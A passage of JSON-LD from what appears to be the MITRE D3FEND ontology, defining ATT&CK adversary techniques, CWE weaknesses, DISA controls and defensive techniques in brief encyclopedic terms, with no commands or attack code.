      "d3f:definition": "Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique may bypass Windows file access controls as well as file system monitoring tools. (Citation: Hakobyan 2009)",
      "rdfs:label": "Direct Volume Access",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "_:N6d39a1fb6f4f462d991c0d83378e32d2"
        }
      ]
    },
    {
      "@id": "_:N6d39a1fb6f4f462d991c0d83378e32d2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Volume"
      }
    },
    {
      "@id": "d3f:ATTACKMobilePrivilegeEscalationTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:TA0029"
      },
      "rdfs:label": "Privilege Escalation Technique - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileTechnique"
        },
        {
          "@id": "_:Na46d35f943544e8cb27056e558b0d451"
        }
      ],
      "skos:prefLabel": "Privilege Escalation Technique"
    },
    {
      "@id": "_:Na46d35f943544e8cb27056e558b0d451",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0029"
      }
    },
    {
      "@id": "d3f:CCI-002689_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:FileContentRules"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system collects indicators of compromise.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002689"
    },
    {
      "@id": "d3f:Non-ParametricTests",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-NPT",
      "d3f:definition": "A non-parametric test is used when the underlying distribution of data is non-symmetric (non-normal distribution).",
      "d3f:kb-article": "## References\nNewcastle University. (n.d.). Parametric Hypothesis Tests. [Link](https://www.ncl.ac.uk/webtemplate/ask-assets/external/maths-resources/psychology/non-parametric-hypothesis-tests.html)",
      "rdfs:label": "Non-Parametric Tests",
      "rdfs:subClassOf": {
        "@id": "d3f:HypothesisTesting"
      }
    },
    {
      "@id": "d3f:Reference-SystemAndMethodForStrategicAntiMalwareMonitoring",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patentimages.storage.googleapis.com/d9/02/31/3a28fefc73661d/US20230362189A1.pdf"
      },
      "d3f:kb-abstract": "The system and method described herein may leverage active network scanning and passive network monitoring to provide strategic anti-malware monitoring in a network. In particular, the system and method described herein may remotely connect to managed hosts in a network to compute hashes or other signatures associated with processes running thereon and suspicious files hosted thereon, wherein the hashes may be communicated to a cloud database that aggregates all known virus or malware signatures that various anti-virus vendors have catalogued to detect malware infections without requiring the hosts to have a local or resident anti-virus agent. Furthermore, running processes and file system activity may be monitored in the network to further detect malware infections. Additionally, the network scanning and network monitoring may be used to detect hosts that may potentially be participating in an active botnet or hosting botnet content and audit anti-virus strategies deployed in the network.",
      "d3f:kb-author": "Marcus J. Ranum, Ron Gula",
      "d3f:kb-organization": "Tenable Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:NetworkTrafficSignatureAnalysis"
      },
      "d3f:kb-reference-title": "System and method for strategic anti-malware monitoring",
      "rdfs:label": "Reference - System and method for strategic anti-malware monitoring - Tenable"
    },
    {
      "@id": "d3f:validates",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x validates y: The technique x proves the digital artifact y is valid; that is, x shows or confirms the validity of y.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/00669142-v"
      },
      "rdfs:label": "validates",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:hardens"
        }
      ]
    },
    {
      "@id": "d3f:Weakness",
      "@type": "owl:Class",
      "d3f:definition": "A weakness is a condition in a software, firmware, hardware, or service component that, under certain circumstances, could contribute to the introduction of vulnerabilities.",
      "rdfs:label": "Weakness",
      "rdfs:subClassOf": {
        "@id": "d3f:D3FENDCore"
      }
    },
    {
      "@id": "d3f:HeterogeneousTransferLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-HTL",
      "d3f:definition": "Heterogeneous transfer learning is characterized by the source and target domains having differing feature spaces, but may also be combined with other issues such as differing data distributions and label spaces.",
      "d3f:kb-article": "## References\nWang, Q., Mao, K. Z., Wang, B., & Guan, J. (2017). Big data clustering by hybrid optimization algorithm. Journal of Big Data, 4(1), 25. [Link](https://journalofbigdata.springeropen.com/articles/10.1186/s40537-017-0089-0).",
      "rdfs:label": "Heterogeneous Transfer Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:TransferLearning"
      }
    },
    {
      "@id": "d3f:Command",
      "@type": "owl:Class",
      "d3f:definition": "A directive (i.e., an instruction specifying a procedure) which, when issued to a computer system, software, or hardware component, causes that entity to execute a specific action, operation, or computation.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Command_(computing)"
      },
      "rdfs:label": "Command",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformation"
      }
    },
    {
      "@id": "d3f:IPPhone",
      "@type": "owl:Class",
      "d3f:definition": "A VoIP phone or IP phone uses voice over IP technologies for placing and transmitting telephone calls over an IP network, such as the Internet, instead of the traditional public switched telephone network (PSTN). Digital IP-based telephone service uses control protocols such as the Session Initiation Protocol (SIP), Skinny Client Control Protocol (SCCP) or various other proprietary protocols.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:VoIP_phone"
      },
      "rdfs:label": "IP Phone",
      "rdfs:subClassOf": {
        "@id": "d3f:PersonalComputer"
      },
      "skos:altLabel": "VoIP Phone"
    },
    {
      "@id": "d3f:SystemMapping",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SystemMapping"
      ],
      "d3f:d3fend-id": "D3-SYSM",
      "d3f:definition": "System mapping encompasses the techniques to identify the organization's systems, how they are configured and decomposed into subsystems and components, how they are dependent on one another, and where they are physically located.",
      "d3f:display-order": 2,
      "d3f:enables": {
        "@id": "d3f:Model"
      },
      "rdfs:label": "System Mapping",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:N9b9b98e7a4b74e0bbddf36dc82a77611"
        }
      ]
    },
    {
      "@id": "_:N9b9b98e7a4b74e0bbddf36dc82a77611",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Model"
      }
    },
    {
      "@id": "d3f:may-detect",
      "@type": "owl:ObjectProperty",
      "d3f:pref-label": "may detect",
      "rdfs:label": "may-detect",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-counter-attack"
      }
    },
    {
      "@id": "d3f:CWE-291",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-291",
      "d3f:definition": "The product uses an IP address for authentication.",
      "rdfs:label": "Reliance on IP Address for Authentication",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-290"
        },
        {
          "@id": "d3f:CWE-471"
        },
        {
          "@id": "d3f:CWE-923"
        }
      ]
    },
    {
      "@id": "d3f:suspends",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x suspends y: The agent or technique x pauses entity y.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/00543748-v"
      },
      "rdfs:label": "suspends",
      "rdfs:subPropertyOf": {
        "@id": "d3f:evicts"
      }
    },
    {
      "@id": "d3f:enables",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x enables y: A top level technique x enables a tactic y, that is, the property indicates that a technique x is used to put a particular tactic y into action. In other words, x renders y capable or able for some task.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/00513958-v"
      },
      "rdfs:label": "enables",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:RD-0005",
      "@type": "owl:Class",
      "d3f:attack-id": "RD-0005",
      "d3f:definition": "Adversaries may pursue non-cyber counterspace means to create access, leverage, or effects that complement cyber operations. These capabilities span kinetic physical (e.g., direct-ascent or co-orbital interceptors and attacks on ground segments), non-kinetic physical (e.g., lasers, high-power microwave/EMP), and electronic warfare (jamming and spoofing). Each class differs in required resources, detectability, attribution, and the permanence of effects, from reversible interference to irreversible destruction. A pragmatic actor mixes methods: electronic attack to mask or distract, directed energy to blind sensors or upset electronics, and, at the top end, kinetic capabilities to hold assets at risk. Resource development may involve acquisition, partnering, or covert access to such systems; rehearsals are often framed as testing or calibration.",
      "rdfs:label": "Obtain Non-Cyber Capabilities - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/RD-0005/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAResourceDevelopmentTechnique"
      },
      "skos:prefLabel": "Obtain Non-Cyber Capabilities"
    },
    {
      "@id": "d3f:ATLASResourceDevelopmentTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:AML.TA0003"
      },
      "rdfs:label": "Resource Development Technique - ATLAS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTechnique"
        },
        {
          "@id": "_:N88069147d0494d2ab72f8902f4b4826b"
        }
      ],
      "skos:prefLabel": "Resource Development Technique"
    },
    {
      "@id": "_:N88069147d0494d2ab72f8902f4b4826b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AML.TA0003"
      }
    },
    {
      "@id": "d3f:executes",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x executes y: The subject x takes the action of carrying out (executing) y, which is a single software module, function, or instruction.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/02569242-v"
      },
      "rdfs:label": "executes",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:accesses"
        },
        {
          "@id": "d3f:may-execute"
        },
        {
          "@id": "d3f:runs"
        }
      ]
    },
    {
      "@id": "d3f:ATLASAIAttackStagingTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:AML.TA0001"
      },
      "rdfs:label": "AI Attack Staging Technique - ATLAS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTechnique"
        },
        {
          "@id": "_:N04f4a09e400c4a0db758a53488334a04"
        }
      ],
      "skos:prefLabel": "AI Attack Staging Technique"
    },
    {
      "@id": "_:N04f4a09e400c4a0db758a53488334a04",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AML.TA0001"
      }
    },
    {
      "@id": "d3f:CWE-172",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-172",
      "d3f:definition": "The product does not properly encode or decode the data, resulting in unexpected values.",
      "rdfs:label": "Encoding Error",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-707"
      }
    },
    {
      "@id": "d3f:AccessModeling",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:AccessModeling"
      ],
      "d3f:d3fend-id": "D3-AM",
      "d3f:definition": "Access modeling captures and records the access permissions granted to identities (e.g., administrators, users, groups, systems) and optionally includes details on how these identities are stored, managed, and shared across systems.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-RFC7642SystemForCrossDomainIdentityManagementDefinitionsOverviewConceptsAndRequirements"
      },
      "d3f:maps": [
        {
          "@id": "d3f:AccessControlConfiguration"
        },
        {
          "@id": "d3f:DigitalIdentity"
        },
        {
          "@id": "d3f:UserAccount"
        }
      ],
      "rdfs:label": "Access Modeling",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OperationalActivityMapping"
        },
        {
          "@id": "_:N30a1152747b8452592d7d41f4fe9e64c"
        },
        {
          "@id": "_:N75ee0c18659040e7972b31c6dffeb815"
        },
        {
          "@id": "_:N3f5cc846ff134ca8b326595f64e61d60"
        }
      ]
    },
    {
      "@id": "_:N30a1152747b8452592d7d41f4fe9e64c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:maps"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessControlConfiguration"
      }
    },
    {
      "@id": "_:N75ee0c18659040e7972b31c6dffeb815",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:maps"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DigitalIdentity"
      }
    },
    {
      "@id": "_:N3f5cc846ff134ca8b326595f64e61d60",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:maps"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:WindowsNtCreatePagingFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Typically used by Control Panel's \"System\" applet for creating new paged files.",
      "rdfs:label": "Windows NtCreatePagingFile",
      "rdfs:seeAlso": {
        "@id": "https://j00ru.vexillium.org/syscalls/nt/64/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPICreateFile"
      }
    },
    {
      "@id": "d3f:T0806",
      "@type": "owl:Class",
      "d3f:attack-id": "T0806",
      "d3f:definition": "Adversaries may repetitively or successively change I/O point values to perform an action. Brute Force I/O may be achieved by changing either a range of I/O point values or a single point value repeatedly to manipulate a process function. The adversary's goal and the information they have about the target environment will influence which of the options they choose. In the case of brute forcing a range of point values, the adversary may be able to achieve an impact without targeting a specific point. In the case where a single point is targeted, the adversary may be able to generate instability on the process function associated with that particular point.",
      "rdfs:label": "Brute Force I/O - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSImpairProcessControlTechnique"
      },
      "skos:prefLabel": "Brute Force I/O"
    },
    {
      "@id": "d3f:AccessProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:Process"
      },
      "rdfs:label": "Access Process",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:Ne3be9777cca04e67b1201514c1438621"
        }
      ]
    },
    {
      "@id": "_:Ne3be9777cca04e67b1201514c1438621",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:T1653",
      "@type": "owl:Class",
      "d3f:attack-id": "T1653",
      "d3f:definition": "Adversaries may impair a system's ability to hibernate, reboot, or shut down in order to extend access to infected machines. When a computer enters a dormant state, some or all software and hardware may cease to operate which can disrupt malicious activity. (Citation: Sleep, shut down, hibernate)",
      "rdfs:label": "Power Settings",
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:Software-definedRadioDevice",
      "@type": "owl:Class",
      "d3f:definition": "A hardware device that functions primarily as an RF front end plus data conversion and transport, relying on an external host computer to run most waveform/DSP processing and to control operation. It is commonly connected via USB, PCIe, or similar links and behaves like a high-speed radio peripheral.",
      "d3f:synonym": "Peripheral SDR",
      "rdfs:label": "Software-Defined Radio Device",
      "rdfs:seeAlso": {
        "@id": "https://en.wikipedia.org/wiki/Software-defined_radio#RTL-SDR"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:Software-definedRadio"
      }
    },
    {
      "@id": "d3f:CWE-1053",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1053",
      "d3f:definition": "The product does not have documentation that represents how it is designed.",
      "rdfs:label": "Missing Documentation for Design",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1059"
      }
    },
    {
      "@id": "d3f:CWE-1326",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1326",
      "d3f:definition": "A missing immutable root of trust in the hardware results in the ability to bypass secure boot or execute untrusted or adversarial boot code.",
      "rdfs:label": "Missing Immutable Root of Trust in Hardware",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-693"
      }
    },
    {
      "@id": "d3f:SystemFirmwareVerification",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SystemFirmwareVerification"
      ],
      "d3f:d3fend-id": "D3-SFV",
      "d3f:definition": "Cryptographically verifying installed system firmware integrity.",
      "d3f:kb-article": "## How it works\nCryptographic hash values are computed for system firmware. The hash values are compared against precomputed firmware hash values to determine if the firmware has been tampered with.\n\nWhen system firmware verification fails, a set of predefined responses is typically invoked. The responses may direct the system to disable some devices or operations.\n\n## Considerations\n* Requires the use of system-provided security modules\n* Secure hash values will need to be computed for firmware",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-FirmwareVerificationEclypsium"
        },
        {
          "@id": "d3f:Reference-PlatformFirmwareResiliencyGuidelines_NIST"
        }
      ],
      "d3f:verifies": {
        "@id": "d3f:SystemFirmware"
      },
      "rdfs:label": "System Firmware Verification",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FirmwareVerification"
        },
        {
          "@id": "_:Nd6a55dab5a31467a8507f344fd0cebef"
        }
      ]
    },
    {
      "@id": "_:Nd6a55dab5a31467a8507f344fd0cebef",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:verifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemFirmware"
      }
    },
    {
      "@id": "d3f:T1021.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1021.002",
      "d3f:definition": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.",
      "rdfs:label": "SMB/Windows Admin Shares",
      "rdfs:subClassOf": {
        "@id": "d3f:T1021"
      }
    },
    {
      "@id": "d3f:CCI-000386_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization employs automated mechanisms to prevent program execution on the information system in accordance with the organization-defined specifications.",
      "d3f:exactly": {
        "@id": "d3f:ExecutableDenylisting"
      },
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-18T00:00:00"
      },
      "rdfs:label": "CCI-000386"
    },
    {
      "@id": "d3f:T1430",
      "@type": "owl:Class",
      "d3f:attack-id": "T1430",
      "d3f:definition": "Adversaries may track a device’s physical location through use of standard operating system APIs via malicious or exploited applications on the compromised device.",
      "rdfs:label": "Location Tracking - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileCollectionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobileDiscoveryTechnique"
        }
      ],
      "skos:prefLabel": "Location Tracking"
    },
    {
      "@id": "d3f:spoofs",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x spoofs y: The technique x creates a fake instance of a digital artifact y; that is, y is a decoy, fake, or counterfeit.",
      "rdfs:label": "spoofs",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Spoof"
        },
        {
          "@id": "http://wordnet-rdf.princeton.edu/id/03323383-n"
        }
      ],
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:deceives-with"
        }
      ]
    },
    {
      "@id": "d3f:T1028",
      "@type": "owl:Class",
      "d3f:attack-id": "T1028",
      "d3f:definition": "Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). (Citation: Microsoft WinRM) It may be called with the <code>winrm</code> command or by any number of programs such as PowerShell. (Citation: Jacobsen 2014)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1021.006",
      "rdfs:label": "Windows Remote Management",
      "rdfs:seeAlso": {
        "@id": "d3f:T1021.006"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExecutionTechnique"
        },
        {
          "@id": "d3f:LateralMovementTechnique"
        }
      ]
    },
    {
      "@id": "d3f:mapped-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x mapped-by y: The entity x is linked to another entity by entity y.",
      "owl:inverseOf": {
        "@id": "d3f:maps"
      },
      "rdfs:label": "mapped-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:CCI-001813_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces access restrictions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-03-01T00:00:00"
      },
      "rdfs:label": "CCI-001813"
    },
    {
      "@id": "d3f:T1071.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1071.003",
      "d3f:definition": "Adversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.",
      "d3f:produces": {
        "@id": "d3f:OutboundInternetMailTraffic"
      },
      "rdfs:label": "Mail Protocols",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1071"
        },
        {
          "@id": "_:N8b2137241fa94f08996fbe85b432c405"
        }
      ]
    },
    {
      "@id": "_:N8b2137241fa94f08996fbe85b432c405",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetMailTraffic"
      }
    },
    {
      "@id": "d3f:OTControlCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Command and control the managed process.",
      "rdfs:label": "OT Control Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTProcessDataCommandEvent"
        },
        {
          "@id": "_:N15f674b720234b20ab0d18bfc41983c2"
        }
      ]
    },
    {
      "@id": "_:N15f674b720234b20ab0d18bfc41983c2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControlCommand"
      }
    },
    {
      "@id": "d3f:T1645",
      "@type": "owl:Class",
      "d3f:attack-id": "T1645",
      "d3f:definition": "Adversaries may modify system software binaries to establish persistent access to devices. System software binaries are used by the underlying operating system and users over adb or terminal emulators.",
      "rdfs:label": "Compromise Client Software Binary - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobilePersistenceTechnique"
      },
      "skos:prefLabel": "Compromise Client Software Binary"
    },
    {
      "@id": "d3f:T1021.007",
      "@type": "owl:Class",
      "d3f:attack-id": "T1021.007",
      "d3f:definition": "Adversaries may log into accessible cloud services within a compromised environment using [Valid Accounts](https://attack.mitre.org/techniques/T1078) that are synchronized with or federated to on-premises user identities. The adversary may then perform management actions or access cloud-hosted resources as the logged-on user.",
      "rdfs:label": "Cloud Services",
      "rdfs:subClassOf": {
        "@id": "d3f:T1021"
      }
    },
    {
      "@id": "d3f:Reference-HowASLRProtectsLinuxSystemsFromBufferOverflowAttacks_NetworkWorld",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.networkworld.com/article/3331199/what-does-aslr-do-for-linux.html"
      },
      "d3f:kb-abstract": "ASLR (Address Space Layout Randomization) is a memory exploitation mitigation technique used on both Linux and Windows systems. Learn how to tell if it's running, enable/disable it, and get a view of how it works.",
      "d3f:kb-author": "Sandra Henry-Stocker",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Network World",
      "d3f:kb-reference-of": {
        "@id": "d3f:SegmentAddressOffsetRandomization"
      },
      "d3f:kb-reference-title": "How ASLR protects Linux systems from buffer overflow attacks",
      "rdfs:label": "Reference - How ASLR protects Linux systems from buffer overflow attacks - Network World"
    },
    {
      "@id": "d3f:DigitalMessage",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A discrete unit of digital communication created by a sender for one or more intended recipients. Encoded in an application-layer format, a digital message conveys semantics such as commands, data, or status and is transported inside lower-layer containers like network frames or packets.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Message_(computing)"
      },
      "rdfs:label": "Digital Message",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      }
    },
    {
      "@id": "d3f:CWE-943",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-943",
      "d3f:definition": "The product generates a query intended to access or manipulate data in a data store such as a database, but it does not neutralize or incorrectly neutralizes special elements that can modify the intended logic of the query.",
      "d3f:synonym": "NoSQL Injection, NoSQLi",
      "rdfs:label": "Improper Neutralization of Special Elements in Data Query Logic",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-74"
      }
    },
    {
      "@id": "d3f:WindowsReadFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Reads data from the specified file or input/output (I/O) device. Reads occur at the position specified by the file pointer if supported by the device.",
      "d3f:invokes": [
        {
          "@id": "d3f:WindowsNtReadFile"
        },
        {
          "@id": "d3f:WindowsNtReadFileScatter"
        }
      ],
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-readfile"
      },
      "rdfs:label": "Windows ReadFile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPIReadFile"
        },
        {
          "@id": "_:Nad5423352db54fdc876cbe83d737955a"
        },
        {
          "@id": "_:N274761ad9f674cd7b79b4c2b8b937021"
        }
      ]
    },
    {
      "@id": "_:Nad5423352db54fdc876cbe83d737955a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtReadFile"
      }
    },
    {
      "@id": "_:N274761ad9f674cd7b79b4c2b8b937021",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtReadFileScatter"
      }
    },
    {
      "@id": "d3f:CWE-1334",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1334",
      "d3f:definition": "An unauthorized agent can inject errors into a redundant block to deprive the system of redundancy or put the system in a degraded operating mode.",
      "rdfs:label": "Unauthorized Error Injection Can Degrade Hardware Redundancy",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "_:Nfd390917e9d04cb9912ddbfe4b84494a",
      "@type": "owl:AllDisjointClasses",
      "owl:members": {
        "@list": [
          {
            "@id": "d3f:GeometricMean"
          },
          {
            "@id": "d3f:HarmonicMean"
          },
          {
            "@id": "d3f:Mean"
          },
          {
            "@id": "d3f:Median"
          },
          {
            "@id": "d3f:Mode"
          },
          {
            "@id": "d3f:TrimmedMean"
          },
          {
            "@id": "d3f:WeightedMean"
          }
        ]
      }
    },
    {
      "@id": "d3f:PredicateLogic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-PL",
      "d3f:definition": "Predicate logic is is collection of formal systems used in mathematics, philosophy, linguistics, and computer science. First-order logic and Higher-order logic both incorporate predicate logic.",
      "d3f:kb-article": "## References\n1. First-order logic. (2023, May 26). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/First-order_logic)\n2. Higher-order logic. (2023, May 13)\n[Link](https://en.wikipedia.org/wiki/Higher-order_logic)",
      "rdfs:label": "Predicate Logic",
      "rdfs:subClassOf": {
        "@id": "d3f:SymbolicAI"
      }
    },
    {
      "@id": "d3f:T1050",
      "@type": "owl:Class",
      "d3f:attack-id": "T1050",
      "d3f:definition": "When operating systems boot up, they can start programs or applications called services that perform background system functions. (Citation: TechNet Services) A service's configuration information, including the file path to the service's executable, is stored in the Windows Registry.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1543.003",
      "rdfs:label": "New Service",
      "rdfs:seeAlso": {
        "@id": "d3f:T1543.003"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:T1638",
      "@type": "owl:Class",
      "d3f:attack-id": "T1638",
      "d3f:definition": "Adversaries may attempt to position themselves between two or more networked devices to support follow-on behaviors such as [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002) or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1642).",
      "rdfs:label": "Adversary-in-the-Middle - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCollectionTechnique"
      },
      "skos:prefLabel": "Adversary-in-the-Middle"
    },
    {
      "@id": "d3f:T1164",
      "@type": "owl:Class",
      "d3f:attack-id": "T1164",
